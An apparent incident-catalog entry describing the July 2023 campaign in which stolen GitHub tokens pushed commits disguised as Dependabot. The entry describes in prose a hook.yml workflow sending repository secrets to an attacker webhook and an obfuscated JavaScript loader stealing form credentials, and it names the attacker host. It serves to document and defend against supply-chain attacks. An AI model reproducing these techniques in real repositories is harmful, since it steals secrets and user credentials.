Fake Dependabot commits poisoned GitHub repositories

This campaign sits right on the catalog boundary. The attacker did not compromise GitHub's Dependabot service, and a fake Dependabot identity by itself would not be enough for this dataset. What makes the incident qualify is the part Checkmarx confirmed with victims: stolen GitHub personal access tokens were used to push malicious code into real repositories. Those repositories were the authoritative source locations for their projects, even if the public victim list does not yet include a widely known open-source project.

The social engineering was aimed at reviewers, not at the login step. Between July 8 and July 11, 2023, malicious commits landed in hundreds of GitHub repositories. The commits used a fabricated author presentation to look like dependabot[bot] and carried a bland commit message, often just fix. To a maintainer scanning history quickly, that looked close enough to routine automated dependency maintenance to be ignored.

The payload had two parts. First, the attacker added a GitHub Actions workflow named hook.yml that ran on every push and sent repository secrets and variables to send.wagateway.pro/webhook. Second, in repositories with JavaScript, the attacker appended an obfuscated browser-side loader to existing .js files. That loader pulled send.wagateway.pro/client.js?cache=ignore and initialized form interception logic intended to steal credentials entered into web forms.

Checkmarx said most of the visible victims were Indonesian user accounts and that private GitHub organization repositories were affected when the stolen tokens had that reach. The company did not publish the full victim list, so this entry keeps the public examples as evidence rather than treating them as the whole blast radius. The two clearest examples are juniorriau/kejaribiak, where the JavaScript password-stealer append is visible, and Highpolar-Softwares/I-help-privacy-policy, where the hook.yml secret-exfiltration workflow is visible.

The likely upstream credential-theft mechanism remains unconfirmed. Checkmarx suspected the tokens may have been stolen from developer machines by malicious packages or similar local infostealer activity. The important supply-chain lesson is narrower and more durable: a PAT with repository write access can bypass 2FA at the point of use, and once it is stolen, an attacker can alter source in a way that looks like normal automated maintenance unless reviewers inspect the actual diff.

Cause

Unknown

• Checkmarx reported hundreds of affected repositories, including private organization repositories, but did not publish the full victim list.
• This record does not claim GitHub Dependabot was compromised. The attacker spoofed the commit presentation while using stolen repository credentials.
• No high-signal, widely known open-source project impact has been confirmed from the public sources reviewed so far.
• The public example repositories are included as evidence of the technique and payload, not as a complete affected-project list.

• Surprise: When Dependabot Contributes Malicious Codecheckmarx.com
• juniorriau/kejaribiak fake Dependabot commitgithub.com
• Highpolar-Softwares/I-help-privacy-policy fake Dependabot commitgithub.com
• Dependabot impersonators cause trouble on GitHubmalwarebytes.com
• Stolen GitHub Credentials Used to Push Fake Dependabot Commitssecurityweek.com
• GitHub Community: Dependabot fake commits added in our all reposgithub.com
• Reddit r/webdev: PRs from fake dependabotreddit.com
• Hackers are spoofing themselves as GitHub's Dependabot to steal user passwordsitpro.com